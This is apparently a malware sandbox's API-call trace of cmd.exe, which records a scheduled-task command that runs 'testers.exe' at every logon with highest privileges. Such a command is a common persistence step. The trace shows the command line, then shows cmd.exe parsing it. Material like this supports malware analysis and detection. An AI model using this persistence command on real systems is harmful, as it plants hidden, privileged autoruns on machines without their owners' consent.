"CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 138 os_tid = 0x328 [0156.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2bf954 | out: lpSystemTimeAsFileTime=0x2bf954*(dwLowDateTime=0x2cc99e0, dwHighDateTime=0x1d661be)) [0156.525] GetCurrentProcessId () returned 0x318 [0156.525] GetCurrentThreadId () returned 0x328 [0156.525] GetTickCount () returned 0x1133850 [0156.525] QueryPerformanceCounter (in: lpPerformanceCount=0x2bf94c | out: lpPerformanceCount=0x2bf94c*=8702094685) returned 1 [0156.526] GetModuleHandleA (lpModuleName=0x0) returned 0x4a8f0000 [0156.526] __set_app_type (_Type=0x1) [0156.526] __p__fmode () returned 0x75d331f4 [0156.528] __p__commode () returned 0x75d331fc [0156.528] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9121a6) returned 0x0 [0156.528] __getmainargs (in: _Argc=0x4a914238, _Argv=0x4a914240, _Env=0x4a91423c, _DoWildCard=0, _StartInfo=0x4a914140 | out: _Argc=0x4a914238, _Argv=0x4a914240, _Env=0x4a91423c) returned 0 [0156.528] GetCurrentThreadId () returned 0x328 [0156.528] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x328) returned 0x60 [0156.528] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75990000 [0156.528] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadUILanguage") returned 0x759ba84f [0156.528] SetThreadUILanguage (LangId=0x0) returned 0x409 [0156.529] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0156.529] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2bf8e4 | out: phkResult=0x2bf8e4*=0x0) returned 0x2 [0156.529] VirtualQuery (in: lpAddress=0x2bf91b, lpBuffer=0x2bf8b4, dwLength=0x1c | out: lpBuffer=0x2bf8b4*(BaseAddress=0x2bf000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0156.529] VirtualQuery (in: lpAddress=0x1c0000, lpBuffer=0x2bf8b4, dwLength=0x1c | out: lpBuffer=0x2bf8b4*(BaseAddress=0x1c0000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0156.529] VirtualQuery (in: lpAddress=0x1c1000, lpBuffer=0x2bf8b4, dwLength=0x1c | out: lpBuffer=0x2bf8b4*(BaseAddress=0x1c1000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0156.529] VirtualQuery (in: lpAddress=0x1c3000, lpBuffer=0x2bf8b4, dwLength=0x1c | out: lpBuffer=0x2bf8b4*(BaseAddress=0x1c3000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0156.529] VirtualQuery (in: lpAddress=0x2c0000, lpBuffer=0x2bf8b4, dwLength=0x1c | out: lpBuffer=0x2bf8b4*(BaseAddress=0x2c0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x130000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0156.529] GetConsoleOutputCP () returned 0x1b5 [0156.529] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a914260 | out: lpCPInfo=0x4a914260) returned 1 [0156.529] SetConsoleCtrlHandler (HandlerRoutine=0x4a90e72a, Add=1) returned 1 [0156.529] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.529] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0156.530] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.530] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9141ac | out: lpMode=0x4a9141ac) returned 1 [0156.530] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.530] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0156.530] _get_osfhandle (_FileHandle=0) returned 0x3 [0156.530] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9141b0 | out: lpMode=0x4a9141b0) returned 1 [0156.532] _get_osfhandle (_FileHandle=0) returned 0x3 [0156.532] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0156.532] GetEnvironmentStringsW () returned 0x5b2118* [0156.532] GetProcessHeap () returned 0x5a0000 [0156.532] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xaca) returned 0x5b2bf0 [0156.532] FreeEnvironmentStringsW (penv=0x5b2118) returned 1 [0156.532] GetProcessHeap () returned 0x5a0000 [0156.532] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x4) returned 0x5b18b0 [0156.532] GetEnvironmentStringsW () returned 0x5b2118* [0156.532] GetProcessHeap () returned 0x5a0000 [0156.532] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xaca) returned 0x5b36c8 [0156.533] FreeEnvironmentStringsW (penv=0x5b2118) returned 1 [0156.533] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2be854 | out: phkResult=0x2be854*=0x68) returned 0x0 [0156.533] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2be85c, lpData=0x2be860, lpcbData=0x2be858*=0x1000 | out: lpType=0x2be85c*=0x0, lpData=0x2be860*=0x0, lpcbData=0x2be858*=0x1000) returned 0x2 [0156.533] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2be85c, lpData=0x2be860, lpcbData=0x2be858*=0x1000 | out: lpType=0x2be85c*=0x4, lpData=0x2be860*=0x1, lpcbData=0x2be858*=0x4) returned 0x0 [0156.533] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2be85c, lpData=0x2be860, lpcbData=0x2be858*=0x1000 | out: lpType=0x2be85c*=0x0, lpData=0x2be860*=0x1, lpcbData=0x2be858*=0x1000) returned 0x2 [0156.533] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2be85c, lpData=0x2be860, lpcbData=0x2be858*=0x1000 | out: lpType=0x2be85c*=0x4, lpData=0x2be860*=0x0, lpcbData=0x2be858*=0x4) returned 0x0 [0156.533] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2be85c, lpData=0x2be860, lpcbData=0x2be858*=0x1000 | out: lpType=0x2be85c*=0x4, lpData=0x2be860*=0x40, lpcbData=0x2be858*=0x4) returned 0x0 [0156.533] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2be85c, lpData=0x2be860, lpcbData=0x2be858*=0x1000 | out: lpType=0x2be85c*=0x4, lpData=0x2be860*=0x40, lpcbData=0x2be858*=0x4) returned 0x0 [0156.533] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2be85c, lpData=0x2be860, lpcbData=0x2be858*=0x1000 | out: lpType=0x2be85c*=0x0, lpData=0x2be860*=0x40, lpcbData=0x2be858*=0x1000) returned 0x2 [0156.533] RegCloseKey (hKey=0x68) returned 0x0 [0156.533] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2be854 | out: phkResult=0x2be854*=0x68) returned 0x0 [0156.533] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2be85c, lpData=0x2be860, lpcbData=0x2be858*=0x1000 | out: lpType=0x2be85c*=0x0, lpData=0x2be860*=0x40, lpcbData=0x2be858*=0x1000) returned 0x2 [0156.533] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2be85c, lpData=0x2be860, lpcbData=0x2be858*=0x1000 | out: lpType=0x2be85c*=0x4, lpData=0x2be860*=0x1, lpcbData=0x2be858*=0x4) returned 0x0 [0156.533] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2be85c, lpData=0x2be860, lpcbData=0x2be858*=0x1000 | out: lpType=0x2be85c*=0x0, lpData=0x2be860*=0x1, lpcbData=0x2be858*=0x1000) returned 0x2 [0156.533] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2be85c, lpData=0x2be860, lpcbData=0x2be858*=0x1000 | out: lpType=0x2be85c*=0x4, lpData=0x2be860*=0x0, lpcbData=0x2be858*=0x4) returned 0x0 [0156.533] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2be85c, lpData=0x2be860, lpcbData=0x2be858*=0x1000 | out: lpType=0x2be85c*=0x4, lpData=0x2be860*=0x9, lpcbData=0x2be858*=0x4) returned 0x0 [0156.534] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2be85c, lpData=0x2be860, lpcbData=0x2be858*=0x1000 | out: lpType=0x2be85c*=0x4, lpData=0x2be860*=0x9, lpcbData=0x2be858*=0x4) returned 0x0 [0156.534] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2be85c, lpData=0x2be860, lpcbData=0x2be858*=0x1000 | out: lpType=0x2be85c*=0x0, lpData=0x2be860*=0x9, lpcbData=0x2be858*=0x1000) returned 0x2 [0156.534] RegCloseKey (hKey=0x68) returned 0x0 [0156.534] time (in: timer=0x0 | out: timer=0x0) returned 0x5f1ae179 [0156.534] srand (_Seed=0x5f1ae179) [0156.534] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\testers.exe" [0156.534] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\testers.exe" [0156.535] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a915260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.535] GetProcessHeap () returned 0x5a0000 [0156.535] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x210) returned 0x5b2118 [0156.535] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5b2120, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0156.535] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a920640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0156.535] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a920640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0156.535] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a920640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0156.536] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0156.536] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0156.536] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0156.536] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0156.536] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0156.536] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0156.536] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0156.536] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0156.536] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0156.536] GetProcessHeap () returned 0x5a0000 [0156.536] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2bf0 | out: hHeap=0x5a0000) returned 1 [0156.536] GetEnvironmentStringsW () returned 0x5b2330* [0156.536] GetProcessHeap () returned 0x5a0000 [0156.536] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xae2) returned 0x5b4c90 [0156.536] FreeEnvironmentStringsW (penv=0x5b2330) returned 1 [0156.536] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a920640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.536] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a920640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0156.536] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0156.536] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0156.536] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0156.536] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0156.536] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0156.536] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0156.536] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0156.536] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0156.536] GetProcessHeap () returned 0x5a0000 [0156.536] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x30) returned 0x5b17e0 [0156.536] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2bf620 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x2bf620, lpFilePart=0x2bf61c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2bf61c*="system32") returned 0x13 [0156.537] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0156.537] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x2bf39c | out: lpFindFileData=0x2bf39c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x5b5780 [0156.537] FindClose (in: hFindFile=0x5b5780 | out: hFindFile=0x5b5780) returned 1 [0156.537] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x2bf39c | out: lpFindFileData=0x2bf39c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x5b5780 [0156.537] FindClose (in: hFindFile=0x5b5780 | out: hFindFile=0x5b5780) returned 1 [0156.537] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0156.537] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0156.537] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0156.537] GetProcessHeap () returned 0x5a0000 [0156.537] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4c90 | out: hHeap=0x5a0000) returned 1 [0156.537] GetEnvironmentStringsW () returned 0x5b41a0* [0156.537] GetProcessHeap () returned 0x5a0000 [0156.537] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xb12) returned 0x5b5fc0 [0156.538] FreeEnvironmentStringsW (penv=0x5b41a0) returned 1 [0156.538] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a915260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.538] GetProcessHeap () returned 0x5a0000 [0156.538] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b17e0 | out: hHeap=0x5a0000) returned 1 [0156.538] GetProcessHeap () returned 0x5a0000 [0156.538] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x400e) returned 0x5b6ae0 [0156.538] GetProcessHeap () returned 0x5a0000 [0156.538] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xc6) returned 0x5b2e50 [0156.538] GetProcessHeap () returned 0x5a0000 [0156.538] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b6ae0 | out: hHeap=0x5a0000) returned 1 [0156.538] GetConsoleOutputCP () returned 0x1b5 [0156.538] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a914260 | out: lpCPInfo=0x4a914260) returned 1 [0156.538] GetUserDefaultLCID () returned 0x409 [0156.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a914950, cchData=8 | out: lpLCData=":") returned 2 [0156.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2bf760, cchData=128 | out: lpLCData="0") returned 2 [0156.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2bf760, cchData=128 | out: lpLCData="0") returned 2 [0156.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2bf760, cchData=128 | out: lpLCData="1") returned 2 [0156.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a914940, cchData=8 | out: lpLCData="/") returned 2 [0156.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a914d80, cchData=32 | out: lpLCData="Mon") returned 4 [0156.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a914d40, cchData=32 | out: lpLCData="Tue") returned 4 [0156.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a914d00, cchData=32 | out: lpLCData="Wed") returned 4 [0156.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a914cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0156.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a914c80, cchData=32 | out: lpLCData="Fri") returned 4 [0156.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a914c40, cchData=32 | out: lpLCData="Sat") returned 4 [0156.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a914c00, cchData=32 | out: lpLCData="Sun") returned 4 [0156.539] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a914930, cchData=8 | out: lpLCData=".") returned 2 [0156.540] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a914920, cchData=8 | out: lpLCData=",") returned 2 [0156.540] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0156.540] GetProcessHeap () returned 0x5a0000 [0156.541] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20c) returned 0x5b2f20 [0156.541] GetConsoleTitleW (in: lpConsoleTitle=0x5b2f20, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.541] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75990000 [0156.541] GetProcAddress (hModule=0x75990000, lpProcName="CopyFileExW") returned 0x759c3b92 [0156.541] GetProcAddress (hModule=0x75990000, lpProcName="IsDebuggerPresent") returned 0x759a4a5d [0156.541] GetProcAddress (hModule=0x75990000, lpProcName="SetConsoleInputExeNameW") returned 0x759ba79d [0156.542] GetProcessHeap () returned 0x5a0000 [0156.542] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x400a) returned 0x5b6ae0 [0156.542] GetProcessHeap () returned 0x5a0000 [0156.542] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b6ae0 | out: hHeap=0x5a0000) returned 1 [0156.543] _wcsicmp (_String1="schtasks", _String2=")") returned 74 [0156.543] _wcsicmp (_String1="FOR", _String2="schtasks") returned -13 [0156.543] _wcsicmp (_String1="FOR/?", _String2="schtasks") returned -13 [0156.543] _wcsicmp (_String1="IF", _String2="schtasks") returned -10 [0156.543] _wcsicmp (_String1="IF/?", _String2="schtasks") returned -10 [0156.543] _wcsicmp (_String1="REM", _String2="schtasks") returned -1 [0156.543] _wcsicmp (_String1="REM/?", _String2="schtasks") returned -1 [0156.543] GetProcessHeap () returned 0x5a0000 [0156.543] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x58) returned 0x5b3138 [0156.543] GetProcessHeap () returned 0x5a0000 [0156.543] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1a) returned 0x5b5800 [0156.545] GetProcessHeap () returned 0x5a0000 [0156.545] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xb2) returned 0x5b3198 [0156.546] GetConsoleTitleW (in: lpConsoleTitle=0x2bf458, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.547] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0156.547] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0156.547] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0156.547] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0156.547] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0156.547] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0156.547] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0156.547] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0156.547] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0156.547] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0156.547] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0156.547] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0156.547] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0156.547] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0156.547] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0156.547] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0156.547] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0156.547] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0156.548] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0156.548] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0156.548] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0156.548] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0156.548] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0156.548] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0156.548] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0156.548] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0156.548] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0156.548] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0156.548] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0156.548] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0156.548] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0156.548] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0156.548] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0156.548] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0156.548] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0156.548] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0156.548] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0156.548] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0156.548] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0156.548] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0156.548] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0156.548] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0156.548] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0156.548] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0156.548] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0156.548] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0156.548] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0156.548] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0156.548] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0156.548] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0156.548] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0156.549] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0156.549] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0156.549] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0156.549] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0156.549] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0156.549] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0156.549] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0156.549] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0156.549] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0156.549] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0156.549] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0156.549] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0156.549] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0156.549] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0156.549] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0156.549] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0156.549] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0156.549] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0156.549] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0156.549] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0156.549] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0156.549] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0156.549] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0156.549] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0156.549] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0156.549] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0156.549] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0156.549] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0156.549] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0156.549] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0156.549] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0156.549] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0156.549] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0156.549] _wcsicmp (_String1="schtasks", _String2="FOR") returned 13 [0156.549] _wcsicmp (_String1="schtasks", _String2="IF") returned 10 [0156.549] _wcsicmp (_String1="schtasks", _String2="REM") returned 1 [0156.550] GetProcessHeap () returned 0x5a0000 [0156.550] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x210) returned 0x5b3258 [0156.550] GetProcessHeap () returned 0x5a0000 [0156.550] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xc4) returned 0x5b3470 [0156.550] _wcsnicmp (_String1="scht", _String2="cmd ", _MaxCount=0x4) returned 16 [0156.550] GetProcessHeap () returned 0x5a0000 [0156.550] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x418) returned 0x5a07f0 [0156.550] SetErrorMode (uMode=0x0) returned 0x1 [0156.550] SetErrorMode (uMode=0x1) returned 0x0 [0156.550] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5a07f8, lpFilePart=0x2bef78 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2bef78*="system32") returned 0x13 [0156.550] SetErrorMode (uMode=0x1) returned 0x1 [0156.551] GetProcessHeap () returned 